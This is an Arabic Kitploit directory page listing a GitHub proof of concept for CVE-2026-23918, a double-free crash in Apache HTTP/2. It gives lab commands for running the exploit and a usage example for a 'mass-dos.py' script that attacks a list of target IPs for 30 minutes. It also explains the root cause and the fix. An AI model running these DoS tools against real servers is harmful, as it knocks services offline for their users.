Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-23918 — PoC لثغرة التحرير المزدوج في Apache HTTP/2 (CVE-2026-23918) | Kitploit
أدوات/GitHubGitHub/rhasan-com/cve-2026-23918
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubrhasan-com/cve-2026-23918

CVE-2026-23918

PoC لثغرة التحرير المزدوج في Apache HTTP/2 (CVE-2026-23918)

عرض المستودع
83منذ 4 أشهرلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-23918: ثغرة رفض الخدمة (DoS) عبر التحرير المزدوج في Apache HTTP/2

CVE-2026-23918 Apache 2.4.66 DoS PoC Python 3

CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: تحرير مزدوج | درجة CVSS 8.8 | أُصلحت في 2.4.67

ثغرة تحرير مزدوج في mod_http2 (h2_mplx.c) تتيح للمهاجمين عن بُعد التسبب في رفض الخدمة (تعطّل عامل/worker) عبر إطارات RST_STREAM سريعة تؤدي إلى حالة سباق بين c1c2_stream_joined() و m_stream_cleanup().


بدء سريع

root@kitploit:~
# 1. Start the lab
docker-compose up --build -d

# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443

# 3. Watch the crash
docker logs -f apache-lab

# 4. Clean up
docker-compose down -v

النتيجة: يتعطل الخادم خلال ~30 ثانية إلى 3 دقائق بإشارة SIGSEGV — تم تأكيد رفض الخدمة بشكل موثوق.


الاستغلالات

الملفالوصف
poc.pyRapid-RST — هجوم سريع، يعطّل الخوادم خلال 30 ثانية إلى 3 دقائق
exploits/slow-drip.pySlow Drip — هجوم مستمر منخفض النطاق الترددي
exploits/mass-dos.pyMass DoS — رفض خدمة مستمر متعدد الأهداف

استخدام Mass DoS

root@kitploit:~
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt

# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7

ما الذي تستغله؟

تحدث الثغرة عندما:

  1. يتم ضم دفق (stream) بواسطة كل من c1c2_stream_joined() و m_stream_cleanup() في الوقت نفسه
  2. يقوم كلاهما بإضافة الدفق نفسه إلى m->spurge دون إزالة التكرار
  3. يقوم h2_purge_then_destroy() بتدمير الدفق مرتين → تحرير مزدوج → segfault
image

التخفيف

قم بالترقية إلى Apache 2.4.67 أو أحدث.

  • NVD — CVE-2026-23918
  • Apache Security Advisory

تحليل معمّق

تحليل كامل للثغرة، شرح تفصيلي للسبب الجذري، ملاحظات حول الاستغلال، وإرشادات المعالجة: → rhasan.com/CVE-2026-23918


الاعتمادات

اكتشفهاBartlomiej Dmitruk (striga.ai) · Stanislaw Strzalkowski (isec.pl)
أُبلغ عنها2025-12-10
أُصلحت فيApache 2.4.67

المراجع

  • CWE-415: Double Free
  • oss-sec ML

⭐ امنح هذا المستودع نجمة إذا وجدته مفيدًا!

Stars

Stargazers over time

تنزيل الأداة